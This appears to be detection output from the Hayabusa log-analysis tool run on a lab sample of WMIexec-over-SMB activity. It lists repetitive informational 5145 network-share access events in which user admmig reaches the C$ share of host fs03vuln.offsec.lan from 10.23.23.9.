10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 